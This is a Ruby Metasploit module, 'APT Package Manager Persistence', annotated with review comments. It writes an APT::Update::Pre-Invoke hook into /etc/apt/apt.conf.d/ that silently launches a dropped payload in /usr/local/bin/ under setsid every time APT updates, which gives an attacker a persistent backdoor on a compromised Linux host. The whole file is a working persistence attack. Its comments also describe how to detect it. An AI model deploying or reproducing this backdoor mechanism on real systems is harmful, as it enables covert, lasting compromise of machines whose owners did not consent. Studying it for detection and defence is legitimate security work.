##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
  # Local persistence module. It drops a payload file into WritableDir and
  # writes an APT::Update::Pre-Invoke hook into /etc/apt/apt.conf.d/ that
  # launches that file (via setsid, in the background) the next time APT runs
  # an update. No handler is started: DefaultOptions sets
  # DisablePayloadHandler => true, so an exploit/multi/handler must be run
  # separately to catch the session.
  #
  # Observable artefacts of a run, as produced by #exploit below:
  #   - a new file in /etc/apt/apt.conf.d/ whose only content is an
  #     APT::Update::Pre-Invoke directive pointing at WritableDir/<name>;
  #   - a new mode-0755 file in WritableDir (default /usr/local/bin/).
  # Reviewing apt.conf.d for unexpected Pre-Invoke entries is the direct
  # detection. FileDropper is included but register_file_for_cleanup is never
  # called in this file, so neither artefact is removed on session cleanup.
  Rank = ExcellentRanking
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Msf::Post::File
  include Msf::Post::Linux::System

  # Module metadata and options.
  #   HOOKNAME      (optional) file name to use under /etc/apt/apt.conf.d/;
  #                 a random "digits + letters" name is generated if unset.
  #   BACKDOOR_NAME (optional) file name for the dropped payload; random
  #                 alphanumeric if unset.
  #   WritableDir   (advanced) directory the payload is written to; it is
  #                 concatenated without a separator in #exploit, so the
  #                 value is expected to end with '/' (the default does).
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'APT Package Manager Persistence',
        'Description' => %q{
          This module will run a payload when the package manager is used. No
          handler is ran automatically so you must configure an appropriate
          exploit/multi/handler to connect. This module creates a pre-invoke hook
          for APT in apt.conf.d. The hook name syntax is numeric followed by text.
        },
        'License' => MSF_LICENSE,
        'Author' => ['Aaron Ringo'],
        'Platform' => ['linux', 'unix'],
        'Arch' => [
          ARCH_CMD,
          ARCH_X86,
          ARCH_X64,
          ARCH_ARMLE,
          ARCH_AARCH64,
          ARCH_PPC,
          ARCH_MIPSLE,
          ARCH_MIPSBE
        ],
        'SessionTypes' => ['shell', 'meterpreter'],
        # WfsDelay 0 + DisablePayloadHandler: the module returns immediately
        # and never listens for the payload itself.
        'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => true },
        'DisclosureDate' => '1999-03-09', # Date APT package manager was included in Debian
        'References' => ['URL', 'https://unix.stackexchange.com/questions/204414/how-to-run-a-command-before-download-with-apt-get'],
        'Targets' => [['Automatic', {}]],
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('HOOKNAME', [false, 'Name of hook file to write']),
        OptString.new('BACKDOOR_NAME', [false, 'Name of binary to write'])
      ]
    )

    register_advanced_options(
      [
        OptString.new('WritableDir', [true, 'A directory where we can write files', '/usr/local/bin/'])
      ]
    )
  end

  # Writes the hook file and then the payload file, checking that each exists
  # afterwards. Fails with Failure::BadConfig when either directory is not
  # writable from the session, and with Failure::Unknown when a write did not
  # leave a file behind.
  def exploit
    hook_path = '/etc/apt/apt.conf.d/'
    # writable? is provided by the Msf::Post::File mixin; per the message
    # below, an unwritable path is read as either missing privileges or APT
    # not being installed.
    unless writable? hook_path
      fail_with Failure::BadConfig, "#{hook_path} not writable, or APT is not on system"
    end
    # Hook name defaults to two digits followed by 5-8 letters (the naming
    # convention mentioned in the description). NOTE(review): `<<` mutates
    # its receiver, so this relies on the literal above not being frozen —
    # no frozen_string_literal pragma is visible in this file.
    hook_path << (datastore['HOOKNAME'] || "#{rand_text_numeric(2)}#{rand_text_alpha(5..8)}")

    backdoor_path = datastore['WritableDir']
    unless writable? backdoor_path
      fail_with Failure::BadConfig, "#{backdoor_path} is not writable"
    end
    backdoor_name = datastore['BACKDOOR_NAME'] || rand_text_alphanumeric(5..10)
    # No separator is added, so WritableDir must end in '/'. NOTE(review):
    # if datastore['WritableDir'] returns its stored String object, this
    # `<<` appends the name into the datastore value itself and a second run
    # would start from an already-suffixed path — confirm against the
    # datastore implementation before relying on re-runs.
    backdoor_path << backdoor_name

    print_status('Attempting to write hook:')
    # The whole hook file is this one directive; APT launches the payload
    # under setsid in the background with stderr discarded.
    hook_script = "APT::Update::Pre-Invoke {\"setsid #{backdoor_path} 2>/dev/null &\"};"
    write_file(hook_path, hook_script)

    # write_file's return value is ignored; existence is the success test.
    unless exist? hook_path
      fail_with Failure::Unknown, 'Failed to write Hook'
    end
    print_status("Wrote #{hook_path}")

    # cmd payloads are written as-is; native payloads go through
    # generate_payload_exe from Msf::Exploit::EXE.
    if payload.arch.first == 'cmd'
      write_file(backdoor_path, payload.encoded)
    else
      write_file(backdoor_path, generate_payload_exe)
    end

    unless exist? backdoor_path
      fail_with Failure::Unknown, "Failed to write #{backdoor_path}"
    end
    print_status("Backdoor uploaded #{backdoor_path}")
    print_status('Backdoor will run on next APT update')

    # permissions chosen to reflect common perms in /usr/local/bin/
    # (applied only after the file has been confirmed to exist)
    chmod(backdoor_path, 0755)
  end
end